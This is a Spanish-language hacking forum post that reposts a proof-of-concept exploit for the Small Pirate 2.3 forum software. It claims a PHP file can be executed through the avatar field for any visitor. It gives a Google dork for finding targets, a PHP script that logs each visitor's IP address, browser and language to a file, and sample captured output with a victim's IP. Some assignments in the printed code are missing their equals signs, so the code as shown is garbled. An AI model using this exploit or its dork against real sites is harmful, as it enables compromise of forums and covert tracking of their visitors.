comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC

  • 0 Respuestas
  • 1855 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 146
  • Actividad:
    33.33%
  • Reputación 3
    • Ver Perfil
« en: Agosto 27, 2011, 05:33:54 pm »
# Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.spirate.net
# Tested on: Linux

[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.


[POC]
This vulnerability allow execute a php external file in any visitor of the forum.
The php file should have the malicious code.
The scope of the attack depends on the strength of the php file.
Código: [Seleccionar]

<?php
// Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
$ip $_SERVER['REMOTE_ADDR'];
$so$_SERVER['HTTP_USER_AGENT'];
$lan$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$url$_SERVER['PHP_SELF'];
$path$_SERVER['DOCUMENT_ROOT'];
$archivo 'pwned.txt';
$fp fopen($archivo"a");
$string "
$path$url
VICTIM: 
$ip
info: 
$so
language: 
$lan
"
;
$write fputs($fp$string);
fclose($fp);
?>


[Content of pwned.txt]

/home146/sub011/sc78626-TZRV/xxxxxxxxx.org/poc.php

VICTIM: 207.182.149.243

info: Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0

 

¿Te gustó el post? COMPARTILO!



ERS Viewer 2013 ERS File Handling Buffer Overflow

Iniciado por Mayk0

Respuestas: 0
Vistas: 1577
Último mensaje Julio 09, 2013, 05:47:36 pm
por Mayk0
[Tutorial]Local File Include (LFI)

Iniciado por arthusu

Respuestas: 8
Vistas: 6871
Último mensaje Marzo 05, 2013, 01:44:55 am
por arthusu
XSS and MySQL FILE

Iniciado por Black_melen

Respuestas: 2
Vistas: 2732
Último mensaje Junio 20, 2015, 03:47:21 pm
por Black_melen
Joomla 0-Day - HTTP Headers Remote Code Execution - CVE-2015-8562

Iniciado por Franciscodc

Respuestas: 0
Vistas: 2948
Último mensaje Diciembre 26, 2015, 05:10:59 am
por Franciscodc
PHP MatchMaker Remote User Reset Password Vulnerability

Iniciado por hielasangre

Respuestas: 0
Vistas: 1595
Último mensaje Agosto 27, 2011, 05:43:42 pm
por hielasangre